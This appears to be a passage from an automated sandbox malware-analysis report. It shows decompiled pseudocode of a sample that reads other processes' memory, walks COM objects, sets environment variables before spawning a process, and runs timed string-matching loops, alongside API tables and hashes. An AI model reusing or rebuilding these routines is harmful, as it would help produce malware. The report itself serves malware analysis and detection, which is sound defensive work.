0x005cb4cd
0x005cb4d3
0x005cb4d9
0x005cb4dc
0x005cb4e1
0x005cb4e1
0x005cb4e4
0x005cb4ea
0x005cb4ed
0x005cb4f2
0x005cb4f2
0x005cb4f5
0x005cb4fb
0x005cb4fe
0x005cb503
0x005cb503
0x005cb506
0x005cb50a
0x005cb50e
0x005cb512
0x005cb516
0x005cb51a
0x005cb520
0x005cb539
0x005cb53c
0x005cb541
0x005cb541
0x005cb544
0x005cb54a
0x005cb54d
0x005cb552
0x005cb552
0x005cb555
0x005cb55b
0x005cb55e
0x005cb563
0x005cb563
0x005cb56a
0x005cb56e
0x005cb571
0x005cb576
0x005cb57d
0x005cb57f
0x005cb581
0x005cb583
0x005cb586
0x005cb588
0x005cb522
0x005cb522
0x005cb529
0x005cb52f
0x005cb531
0x005cb531
0x005cb58c
0x005cb595

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 005CB41B
ReadProcessMemory.KERNEL32(?,?,?,0000001C), ref: 005CB4A0
SetEvent.KERNEL32(?), ref: 005CB4CD
ReadProcessMemory.KERNEL32(?,?,?,0000007F), ref: 005CB5B4
ReadProcessMemory.KERNEL32(?,?,?,000003FF), ref: 005CB60C
ReadProcessMemory.KERNEL32(?,?,?,0000007F), ref: 005CB65F

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

Part of subcall function 005C3180: RtlAllocateHeap.NTDLL(00230000,00000008,?), ref: 005C31BC

ReadProcessMemory.KERNEL32(?,?,00000000,?), ref: 005CB6DA

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Process$MemoryRead$Heap$Allocate$EventObjectSingleWait
String ID:
API String ID: 1187518971-0
Opcode ID: 79eb7b7d377b0d639a640e89eb3040083de0440c8c71e6c10ab4330705668fc9
Instruction ID: 34b17c74b476ddcd113e0657a9e029224b4b40427a4e67493b5ea5eba2bf1e06
Opcode Fuzzy Hash: 79eb7b7d377b0d639a640e89eb3040083de0440c8c71e6c10ab4330705668fc9
Instruction Fuzzy Hash: 4A9150B46083059FEB24DF64D88AF2BBBE9BF84744F04492DF88597391D734E944CA62

Uniqueness

Uniqueness Score: -1.00%

Function 005C3240, Relevance: 10.7, APIs: 7, Instructions: 234
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E005C3240(intOrPtr* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _v16;
				char _v236;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				char _v264;
				intOrPtr _v272;
				intOrPtr* _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr* _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char _v312;
				short _v316;
				intOrPtr _v320;
				char _v328;
				char _v332;
				intOrPtr* _v336;
				void* _v340;
				intOrPtr* _v344;
				intOrPtr _v348;
				intOrPtr* _v352;
				intOrPtr* _v356;
				char _v360;
				WCHAR* _v364;
				WCHAR* _v368;
				WCHAR* _v372;
				WCHAR* _v376;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				void* _t110;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				void* _t117;
				void* _t120;
				intOrPtr* _t121;
				intOrPtr* _t123;
				void* _t126;
				intOrPtr* _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t144;
				char* _t148;
				WCHAR* _t149;
				intOrPtr* _t153;
				intOrPtr _t162;
				intOrPtr _t163;
				intOrPtr* _t172;
				intOrPtr _t180;
				short _t181;
				intOrPtr* _t186;
				intOrPtr* _t188;
				char* _t191;
				signed int _t193;
				void* _t195;

				_t195 = (_t193 & 0xfffffff8) - 0x128;
				_t172 = _a4;
				_t102 =  &_v264;
				 *_t102 = 0;
				_push(_t102);
				_push(1);
				_push(_t172);
				if( *((intOrPtr*)( *_t172 + 0x38))() < 0) {
					_t104 = 0;
					L26:
					return _t104;
				}
				_t105 = _v276;
				_t186 =  &_v236;
				 *_t186 = 0;
				 *((intOrPtr*)( *_t105 + 0x1c))(_t105, _t186);
				_v320 = 0;
				if( *_t186 <= 0) {
					L20:
					_t107 = _v284;
					 *((intOrPtr*)( *_t107 + 8))(_t107);
					_t153 = _a4;
					_t109 =  &_v332;
					 *_t109 = 0;
					_t110 =  *((intOrPtr*)( *_t153 + 0x28))(_t153, 0, _t109);
					_t104 = 0;
					if(_t110 < 0) {
						goto L26;
					}
					_t111 = _v344;
					_t180 = 0;
					_t188 =  &_v340;
					 *_t188 = 0;
					 *((intOrPtr*)( *_t111 + 0x1c))(_t111, _t188);
					if( *_t188 <= 0) {
						L25:
						_t113 = _v352;
						 *((intOrPtr*)( *_t113 + 8))(_t113);
						_t104 = _v348;
						goto L26;
					} else {
						goto L22;
					}
					do {
						L22:
						_t181 = _t180 + 1;
						_v340 = 3;
						_t115 = _v352;
						_v312 = 0;
						_v332 = _t181;
						_v292 = _t181;
						_v316 = _t181;
						_v296 = _v336;
						_v288 = _v328;
						_v300 = _v340;
						_v320 =  *_t115;
						_t117 =  *((intOrPtr*)(_v320 + 0x20))(_t115, _v300, _v296, _v292, _v288,  &_v312);
						 *0x5d9ddc( &_v364);
						if(_t117 >= 0) {
							_t120 = E005C3240(_v340, _a8, _a12);
							_t195 = _t195 + 0xc;
							_v372 = _v372 + _t120;
							_t121 = _v340;
							 *((intOrPtr*)( *_t121 + 8))(_t121);
						}
						_t180 = _v344;
					} while (_t180 < _v376);
					goto L25;
				}
				_t162 = 0;
				_t191 =  &_v316;
				_v320 = 0;
				do {
					_t163 = _t162 + 1;
					_v316 = 3;
					_t123 = _v284;
					_v328 = 0;
					_t148 = _t191;
					_v308 = _t163;
					_v280 = _t163;
					_v252 = _t163;
					_v296 = _t123;
					_v256 = _v312;
					_v248 = _v304;
					_v260 = _v316;
					_v292 =  *_t123;
					_t126 =  *((intOrPtr*)(_v292 + 0x20))(_v296, _v260, _v256, _v252, _v248,  &_v328);
					 *0x5d9ddc(_t148);
					if(_t126 < 0) {
						_t162 = _v308;
						_t191 = _t148;
						goto L19;
					}
					_t128 = _v356;
					_v344 = 0;
					_t129 =  *((intOrPtr*)( *_t128 + 0x1c))(_t128, _t148);
					_t191 = _t148;
					if(_t129 < 0) {
						L18:
						_t130 = _v364;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t162 = _v320;
						goto L19;
					}
					_t132 = _v364;
					_v360 = 0;
					_t133 =  *((intOrPtr*)( *_t132 + 0x50))(_t132,  &_v360);
					_t149 =  &_v284;
					if(_t133 < 0) {
						L17:
						 *((intOrPtr*)( *0x5d9dd8))(_v360);
						goto L18;
					}
					if(StrStrIW(_v368, _a8) == 0) {
						L16:
						 *0x5d9dd8(_v372);
						goto L17;
					}
					E005D4520(_t149, 0x20);
					_t195 = _t195 + 8;
					if(lstrcmpW(_v364, _t149) == 0) {
						E005D4520(_t149, 0x21);
						_t195 = _t195 + 8;
						if(StrStrIW(_v372, _t149) != 0) {
							L15:
							_v372 =  &(_v372[0x200]);
							goto L16;
						}
						E005D4520(_t149, 0x22);
						_t195 = _t195 + 8;
						if(StrStrIW(_v376, _t149) == 0) {
							_v376 =  &(_v376[0]);
							goto L16;
						}
						goto L15;
					}
					if(_a12 != 0) {
						_t144 = _a4;
						 *((intOrPtr*)( *_t144 + 0x3c))(_t144, _v364, 0);
					}
					goto L16;
					L19:
				} while (_t162 < _v272);
				goto L20;
			}

0x005c3249
0x005c324f
0x005c3252
0x005c3256
0x005c325e
0x005c325f
0x005c3261
0x005c3267
0x005c329c
0x005c350b
0x005c3512
0x005c3512
0x005c3269
0x005c326f
0x005c3273
0x005c3279
0x005c327e
0x005c3286
0x005c3418
0x005c3418
0x005c341f
0x005c3422
0x005c3425
0x005c342b
0x005c3434
0x005c3439
0x005c343e
0x00000000
0x00000000
0x005c3444
0x005c3448
0x005c344a
0x005c344e
0x005c3454
0x005c3459
0x005c34fd
0x005c34fd
0x005c3504
0x005c3507
0x00000000
0x00000000
0x00000000
0x00000000
0x005c345f
0x005c345f
0x005c345f
0x005c3460
0x005c3467
0x005c346b
0x005c3473
0x005c3477
0x005c347b
0x005c3487
0x005c348f
0x005c3493
0x005c3499
0x005c34bb
0x005c34c5
0x005c34cd
0x005c34d9
0x005c34de
0x005c34e1
0x005c34e5
0x005c34ec
0x005c34ec
0x005c34ef
0x005c34f3
0x00000000
0x005c345f
0x005c328c
0x005c328e
0x005c3292
0x005c32ac
0x005c32ac
0x005c32ad
0x005c32b4
0x005c32b8
0x005c32c0
0x005c32c2
0x005c32c6
0x005c32ca
0x005c32d6
0x005c32da
0x005c32e2
0x005c32e6
0x005c32ec
0x005c3311
0x005c3317
0x005c331f
0x005c33ab
0x005c33af
0x00000000
0x005c33af
0x005c3325
0x005c3329
0x005c3335
0x005c333a
0x005c333c
0x005c3400
0x005c3400
0x005c3407
0x005c340a
0x00000000
0x005c340a
0x005c3342
0x005c3346
0x005c3356
0x005c335b
0x005c335f
0x005c33f5
0x005c33fe
0x00000000
0x005c33fe
0x005c3376
0x005c33eb
0x005c33ef
0x00000000
0x005c33ef
0x005c337b
0x005c3380
0x005c3390
0x005c33b6
0x005c33bb
0x005c33c7
0x005c33e3
0x005c33e3
0x00000000
0x005c33e3
0x005c33cc
0x005c33d1
0x005c33dd
0x005c32a3
0x00000000
0x005c32a3
0x00000000
0x005c33dd
0x005c3396
0x005c3398
0x005c33a6
0x005c33a6
0x00000000
0x005c340e
0x005c340e
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 005C3317
StrStrIW.SHLWAPI(00000000,?), ref: 005C3372
lstrcmpW.KERNEL32(?,?), ref: 005C3388
StrStrIW.SHLWAPI(?,?), ref: 005C33C3
StrStrIW.SHLWAPI(?,?), ref: 005C33D9
SysFreeString.OLEAUT32(00000000), ref: 005C33EF
VariantClear.OLEAUT32(?), ref: 005C34C5

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: ClearVariant$FreeStringlstrcmp
String ID:
API String ID: 1296292621-0
Opcode ID: 3cd247a3a90157d705f1fb2504c4d660c0732465bd2f154738ecc0afe0cee9a6
Instruction ID: 486498963b6594de55a653f156f0bbe020e4bcef623a2533c98bdab0aa2ac2f3
Opcode Fuzzy Hash: 3cd247a3a90157d705f1fb2504c4d660c0732465bd2f154738ecc0afe0cee9a6
Instruction Fuzzy Hash: 6E91FDB5608305AFC704DF64C888A1BBBE9FFC8714F10891DF88A87260DB71E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005C43E0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 185
processCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E005C43E0(void* __ecx, void* __eflags) {
				void* _t49;
				void* _t50;
				int _t58;
				intOrPtr _t59;
				WCHAR* _t60;
				short* _t61;
				intOrPtr _t64;
				signed int _t73;
				void* _t77;
				WCHAR* _t78;
				signed int _t79;
				WCHAR* _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t89;
				signed int _t93;
				signed int _t94;
				WCHAR* _t98;
				void* _t99;
				struct _STARTUPINFOW* _t100;
				void* _t101;
				void* _t102;
				intOrPtr* _t103;
				void* _t104;
				void* _t105;

				_t105 = __eflags;
				_t77 = _t102;
				_t99 = __ecx;
				E005D6610(_t77, 0, 0x56c);
				_t103 = _t102 + 0xc;
				_push(0);
				_push(0);
				if(E005CFA90(_t99, _t105, 0, _t77, 0) == 0 ||  *_t103 == 0) {
					L26:
					_t49 =  *(_t103 + 0x4c);
					if(_t49 != 0) {
						CloseHandle(_t49);
					}
					_t50 =  *(_t103 + 0x50);
					if(_t50 != 0) {
						CloseHandle(_t50);
					}
					_t51 =  *_t103;
					if( *_t103 != 0) {
						E005C91E0(_t51);
						_t103 = _t103 + 4;
					}
					return  *((intOrPtr*)(_t103 + 4));
				} else {
					_t100 = _t103 + 8;
					_t100->cb = 0x44;
					GetStartupInfoW(_t100);
					if( *((intOrPtr*)(_t103 + 0x580)) == 0) {
						L23:
						_t58 = CreateProcessW( *(_t103 + 0x4c - 0x4c), 0, 0, 0, 0, 0, 0, 0, _t100, _t103 + 0x4c);
						_t59 =  *0x5d9b0c; // 0x26f2b8
						if(_t58 == 0) {
							 *((intOrPtr*)(_t59 + 8)) = 7;
						} else {
							 *((intOrPtr*)(_t59 + 8)) = 1;
							 *((intOrPtr*)(_t103 + 4)) = 1;
						}
						goto L26;
					}
					_t87 =  *0x5d9ac0; // 0x27a398
					_t98 = _t103 + 0x6c;
					_t60 = _t98;
					 *(_t98 - 4) = _t98;
					 *((intOrPtr*)(_t98 - 8)) = _t87;
					if(_t87 == 0) {
						L9:
						_t88 =  *0x5d9bac; // 0x0
						 *_t60 = 0x2c;
						_t61 =  &(_t60[1]);
						 *(_t103 + 0x68) = _t61;
						 *((intOrPtr*)(_t103 + 0x64)) = _t88;
						if(_t88 == 0) {
							L15:
							 *_t61 = 0x2c;
							 *(_t103 + 0x68) =  &(_t61[1]);
							E005C9D40( &(_t61[1]));
							_t64 = E005CB7A0( *0x5d9b84);
							_t104 = _t103 + 4;
							 *((intOrPtr*)(_t104 + 0x64)) = _t64;
							if(_t64 == 0) {
								L22:
								_t78 = _t104 + 0x46c;
								 *((short*)( *((intOrPtr*)(_t78 - 0x404)))) = 0;
								E005D4520(_t78, 0x59);
								_t103 = _t104 + 8;
								SetEnvironmentVariableW(_t78, _t98);
								goto L23;
							}
							_t89 = 0xfffffffe;
							_t93 = 0;
							while( *((short*)(_t64 + _t93 * 2)) != 0) {
								_t93 = _t93 + 1;
								_t89 = _t89 + 0xfffffffe;
								if(_t93 != 0x20) {
									continue;
								}
								 *(_t104 + 0x60) = 0;
								 *(_t104 + 0x5c) = 0x80070057;
								L21:
								E005C91E0(_t64);
								_t104 = _t104 + 4;
								goto L22;
							}
							 *(_t104 + 0x60) = _t93;
							 *(_t104 + 0x5c) = 0;
							E005CC400( *((intOrPtr*)(_t104 + 0x70)), _t64,  ~_t89);
							_t104 = _t104 + 0xc;
							_t64 =  *((intOrPtr*)(_t104 + 0x64));
							_t35 = _t104 + 0x68;
							 *_t35 =  *(_t104 + 0x68) +  *(_t104 + 0x60) +  *(_t104 + 0x60);
							__eflags =  *_t35;
							goto L21;
						}
						_t94 = 0xfffffffe;
						_t79 = 0;
						while( *((short*)(_t88 + _t79 * 2)) != 0) {
							_t79 = _t79 + 1;
							_t94 = _t94 + 0xfffffffe;
							if(_t79 != 0x80) {
								continue;
							}
							 *(_t103 + 0x60) = 0;
							 *(_t103 + 0x5c) = 0x80070057;
							goto L15;
						}
						 *(_t103 + 0x60) = _t79;
						 *(_t103 + 0x5c) = 0;
						E005CC400(_t61, _t88,  ~_t94);
						_t103 = _t103 + 0xc;
						_t61 =  *(_t103 + 0x60) +  *(_t103 + 0x60) +  *(_t103 + 0x68);
						__eflags = _t61;
						 *(_t103 + 0x68) = _t61;
						goto L15;
					}
					_t73 = 0;
					_t101 = 0;
					while( *((short*)(_t87 + _t73 * 2)) != 0) {
						_t73 = _t73 + 1;
						_t101 = _t101 + 0xfffffffe;
						if(_t73 != 0x80) {
							continue;
						}
						 *(_t103 + 0x60) = 0;
						 *(_t103 + 0x5c) = 0x80070057;
						_t60 = _t98;
						goto L9;
					}
					 *(_t103 + 0x60) = _t73;
					 *(_t103 + 0x5c) = 0;
					E005CC400(_t98, _t87, 2 - _t101);
					_t103 = _t103 + 0xc;
					_t81 = _t77 - _t101 + 0x6c;
					__eflags = _t81;
					_t60 = _t81;
					 *(_t103 + 0x68) = _t81;
					goto L9;
				}
			}

0x005c43e0
0x005c43ea
0x005c43ec
0x005c43f7
0x005c43fc
0x005c4401
0x005c4402
0x005c440d
0x005c45f0
0x005c45f0
0x005c45f6
0x005c45f9
0x005c45f9
0x005c45ff
0x005c4605
0x005c4608
0x005c4608
0x005c460e
0x005c4613
0x005c4616
0x005c461b
0x005c461b
0x005c462c
0x005c441e
0x005c4425
0x005c4429
0x005c4430
0x005c4438
0x005c45bc
0x005c45ce
0x005c45d6
0x005c45db
0x005c45e9
0x005c45dd
0x005c45e0
0x005c45e3
0x005c45e3
0x00000000
0x005c45db
0x005c443e
0x005c4444
0x005c4448
0x005c444a
0x005c444f
0x005c4452
0x005c44a7
0x005c44a7
0x005c44ad
0x005c44b2
0x005c44b5
0x005c44bb
0x005c44bf
0x005c4514
0x005c4514
0x005c451c
0x005c4520
0x005c452b
0x005c4530
0x005c4535
0x005c4539
0x005c4597
0x005c4597
0x005c45a4
0x005c45ac
0x005c45b1
0x005c45b6
0x00000000
0x005c45b6
0x005c453b
0x005c4540
0x005c4542
0x005c4549
0x005c454a
0x005c4550
0x00000000
0x00000000
0x005c4552
0x005c455a
0x005c458e
0x005c458f
0x005c4594
0x00000000
0x005c4594
0x005c4566
0x005c456a
0x005c4578
0x005c457d
0x005c4584
0x005c458a
0x005c458a
0x005c458a
0x00000000
0x005c458a
0x005c44c1
0x005c44c6
0x005c44c8
0x005c44cf
0x005c44d0
0x005c44d9
0x00000000
0x00000000
0x005c44db
0x005c44e3
0x00000000
0x005c44e3
0x005c44ef
0x005c44f3
0x005c44fe
0x005c4503
0x005c450c
0x005c450c
0x005c4510
0x00000000
0x005c4510
0x005c4454
0x005c4456
0x005c4458
0x005c445f
0x005c4460
0x005c4468
0x00000000
0x00000000
0x005c446a
0x005c4472
0x005c447a
0x00000000
0x005c447a
0x005c447e
0x005c4487
0x005c4494
0x005c4499
0x005c449e
0x005c449e
0x005c44a1
0x005c44a3
0x00000000
0x005c44a3

APIs

GetStartupInfoW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 005C4430
SetEnvironmentVariableW.KERNEL32(?,?,?,?,00000000), ref: 005C45B6
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C45CE
CloseHandle.KERNEL32(?), ref: 005C45F9
CloseHandle.KERNEL32(?), ref: 005C4608

Strings

W, xrefs: 005C455A

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseHandle$CreateEnvironmentInfoProcessStartupVariable
String ID: W
API String ID: 2864332936-655174618
Opcode ID: 1d264710c88744b1e1ca29a59208a179dd7111bf74e171c2f54bff24f9596660
Instruction ID: 8cee77c26ead2854129d8085ad5be84a4a371fa8926b4e17f816032a02c21a65
Opcode Fuzzy Hash: 1d264710c88744b1e1ca29a59208a179dd7111bf74e171c2f54bff24f9596660
Instruction Fuzzy Hash: 435167B09083419FE7249F69DC89F2BBBE8FB81314F14892EF495873A1E775D804CA52

Uniqueness

Uniqueness Score: -1.00%

Function 005D7560, Relevance: 10.7, APIs: 7, Instructions: 171
stringsleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E005D7560(intOrPtr* __ecx) {
				intOrPtr _t33;
				WCHAR** _t34;
				void* _t38;
				WCHAR** _t44;
				WCHAR** _t45;
				void* _t46;
				void* _t48;
				WCHAR** _t54;
				WCHAR** _t62;
				WCHAR* _t64;
				WCHAR** _t69;
				WCHAR** _t72;
				intOrPtr* _t73;
				signed int _t94;
				WCHAR** _t97;
				void* _t98;
				WCHAR** _t99;
				intOrPtr* _t100;
				void* _t103;
				intOrPtr _t104;
				void* _t105;
				WCHAR*** _t106;

				_t100 = __ecx;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x34)))));
				_t33 = E005CC720();
				 *((intOrPtr*)(_t105 + 0xc)) = _t33;
				if(_t33 == 0) {
					return _t33;
				}
				_t34 = E005C5140(0x10);
				_t106 = _t105 + 4;
				_t72 = _t34;
				E005C91B0(_t34, 8);
				_t94 = 0;
				_t106[6] = 0;
				 *0x5d9d54(0x5d9bbc);
				if( *_t100 == 0) {
					L7:
					 *0x5d9d9c(0x5d9bbc);
					_t38 = E005CC430(_t72);
					_t102 = _t106[0xc];
					if(_t38 >= E005CC430(_t106[0xc]) || E005CC430(_t102) == 0) {
						L29:
						E005C91E0(_t106[3]);
						E005C1EA0(_t72);
						return L005D7400(_t72);
					} else {
						_t44 = 0;
						_t106[2] = _t72;
						do {
							_t106[4] = _t44;
							_t45 = E005C42F0(_t102, _t44);
							 *_t106 = _t45;
							if(_t45 != 0 &&  *( *_t106) != 0) {
								_t48 = E005CC430(_t72);
								_t98 = 0;
								if(_t48 == 0) {
									L17:
									if(_t98 != E005CC430(_t72)) {
										goto L28;
									}
									if(E005CC430( *((intOrPtr*)(_t100 + 0x14))) == 0) {
										L27:
										E005C9260(_t100, _t133, _t106[1], _t106[0xd]);
										Sleep(0x1388);
										goto L28;
									}
									_t103 = 0;
									_t106[1] = 1;
									do {
										_t54 = E005C42F0( *((intOrPtr*)(_t100 + 0x14)), _t103);
										if(_t54 != 0) {
											_t99 = _t54;
											_t73 = _t100;
											if(lstrcmpiW( *_t99,  *(_t106[0xd])) == 0 && lstrcmpiW(_t99[1],  *( *_t106)) == 0) {
												E005D4E70();
												_t89 =  <  ? 0 : _t106[1];
												_t106[1] =  <  ? 0 : _t106[1];
											}
											_t100 = _t73;
											_t72 = _t106[2];
										}
										_t103 = _t103 + 1;
									} while (_t103 < E005CC430( *((intOrPtr*)(_t100 + 0x14))));
									_t133 = _t106[1];
									_t102 = _t106[0xc];
									if(_t106[1] == 0) {
										goto L28;
									}
									goto L27;
								} else {
									goto L13;
								}
								do {
									L13:
									_t62 = E005C42F0(_t72, _t98);
									if(_t62 == 0) {
										goto L16;
									}
									_t64 =  *_t62;
									if(_t64 != 0 && lstrcmpiW( *(_t106[1]), _t64) == 0) {
										goto L17;
									}
									L16:
									_t98 = _t98 + 1;
								} while (_t98 < E005CC430(_t72));
								goto L17;
							}
							L28:
							_t97 =  &(_t106[4][0]);
							_t46 = E005CC430(_t102);
							_t44 = _t97;
						} while (_t97 < _t46);
						goto L29;
					}
				} else {
					goto L2;
				}
				do {
					L2:
					_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t100 + 4)) + _t94 * 4));
					if(_t104 != 0 && lstrcmpiW( *(_t104 + 8), _t106[3]) == 0) {
						_t69 =  *(_t104 + 0x1c);
						if(_t69 != 0) {
							_t106[5] = _t69;
							E005C1200(_t72,  &(_t106[5]));
						}
					}
					_t94 = _t94 + 1;
				} while (_t94 <  *_t100);
				goto L7;
			}

0x005d756b
0x005d756d
0x005d756f
0x005d7576
0x005d757a
0x005d7761
0x005d7761
0x005d7582
0x005d7587
0x005d758a
0x005d7590
0x005d7595
0x005d7597
0x005d75a0
0x005d75a8
0x005d75e1
0x005d75e6
0x005d75ee
0x005d75f3
0x005d7602
0x005d773e
0x005d7742
0x005d774c
0x00000000
0x005d7617
0x005d7617
0x005d7619
0x005d761d
0x005d761f
0x005d7624
0x005d762b
0x005d762e
0x005d7642
0x005d7647
0x005d764b
0x005d767c
0x005d7685
0x00000000
0x00000000
0x005d7695
0x005d770e
0x005d7718
0x005d7722
0x00000000
0x005d7722
0x005d7697
0x005d769c
0x005d76a0
0x005d76a4
0x005d76ab
0x005d76ad
0x005d76b3
0x005d76c3
0x005d76d3
0x005d76e9
0x005d76ec
0x005d76ec
0x005d76f0
0x005d76f2
0x005d76f2
0x005d76f9
0x005d76ff
0x005d7703
0x005d7708
0x005d770c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x005d764d
0x005d764d
0x005d7650
0x005d7657
0x00000000
0x00000000
0x005d7659
0x005d765d
0x00000000
0x00000000
0x005d7670
0x005d7672
0x005d7678
0x00000000
0x005d764d
0x005d7728
0x005d772e
0x005d772f
0x005d7736
0x005d7736
0x00000000
0x005d761d
0x00000000
0x00000000
0x00000000
0x005d75aa
0x005d75aa
0x005d75ad
0x005d75b2
0x005d75c5
0x005d75ca
0x005d75cc
0x005d75d7
0x005d75d7
0x005d75ca
0x005d75dc
0x005d75dd
0x00000000

APIs

RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D75A0
lstrcmpiW.KERNEL32(00000000,?), ref: 005D75BB
RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D75E6
lstrcmpiW.KERNEL32(?,?,00000000,00000000), ref: 005D7666
lstrcmpiW.KERNEL32(00000000,?,00000000,00000000), ref: 005D76BF
lstrcmpiW.KERNEL32(?,00000000), ref: 005D76CD
Sleep.KERNEL32(00001388,?,?,00000000), ref: 005D7722

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: lstrcmpi$CriticalSection$EnterLeaveSleep
String ID:
API String ID: 1272173129-0
Opcode ID: fe7e87c527321044af5fe48a4c54353cfb5499e0489d2025018ea554b241ac90
Instruction ID: 3696f10526afef8245802316fd217a9c2e9acca9b2f62a57fd1839fb73b586a3
Opcode Fuzzy Hash: fe7e87c527321044af5fe48a4c54353cfb5499e0489d2025018ea554b241ac90
Instruction Fuzzy Hash: 2E5130742086069FDB24AF69D855A2EBEE5BBC8781F44442FF84987351FB30DC05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005D5020, Relevance: 9.2, APIs: 6, Instructions: 233
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E005D5020(void* __ecx, void* __eflags) {
				void* _t91;
				void* _t92;
				void* _t94;
				void* _t98;
				intOrPtr _t102;
				struct _SECURITY_ATTRIBUTES* _t103;
				WCHAR* _t113;
				void* _t124;
				intOrPtr _t125;
				void* _t127;
				LPWSTR* _t129;
				signed int _t131;
				signed int _t132;
				void* _t135;
				intOrPtr _t143;
				intOrPtr _t151;
				void* _t153;
				WCHAR* _t157;
				void* _t158;
				WCHAR* _t159;
				void* _t160;
				signed int _t162;
				intOrPtr* _t163;
				intOrPtr* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;

				_t129 = 0;
				_t153 = __ecx;
				 *((intOrPtr*)(_t163 + 8)) = 0;
				 *_t163 = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = 0;
				 *((intOrPtr*)(_t163 + 4)) = 0;
				E005D30C0(_t163 + 0x1c);
				_t159 = _t163 + 0x22;
				E005D4520(_t159, 0x50);
				_t164 = _t163 + 8;
				_t155 = _t164 + 0x4fe;
				if(GetFullPathNameW(_t159, 0x105, _t164 + 0x4fe, 0) == 0) {
					L29:
					_t78 =  *((intOrPtr*)(_t164 + 8));
					if( *((intOrPtr*)(_t164 + 8)) != 0) {
						_t78 = E005C91E0(_t78);
						_t164 = _t164 + 4;
					}
					E005D03D0(_t78);
					return _t129;
				}
				E005D4520(_t159, 0x51);
				_t165 = _t164 + 8;
				_push( *((intOrPtr*)(_t153 + 8)));
				E005D68E0(_t165 + 0xea, 0x105, _t159, _t155);
				_t164 = _t165 + 0x14;
				_t129 = 1;
				if( *((intOrPtr*)(_t153 + 0x24)) > 0) {
					_t131 = 0;
					do {
						 *(_t164 + 0xc) = 0;
						_t160 = _t153;
						E005D4520(_t164 + 0x26, 0x23);
						_t166 = _t164 + 8;
						 *(_t166 + 0x18) = _t131;
						_t132 = _t131 << 4;
						_push( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x2c)) + _t132 + 4)));
						_t153 = _t160;
						E005D68E0(_t166 + 0x304, 0x105, _t164 + 0x26, _t166 + 0xee);
						_t167 = _t166 + 0x14;
						_t91 = E005D0230(_t166 + 0x304, 0, 0, _t167 + 0xc);
						_t164 = _t167 + 0x10;
						if(_t91 == 0) {
							 *(_t164 + 0xc) = 0;
						}
						_t92 = E005D4E70();
						_t162 = _t132;
						if(_t92 -  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 0xc)) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 8) * 0x3c || E005D4E70() -  *(_t164 + 0xc) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 8) * 0x3c) {
							_t94 = _t164 + 4;
							if( *((intOrPtr*)(_t164 + 0x71c)) != 0) {
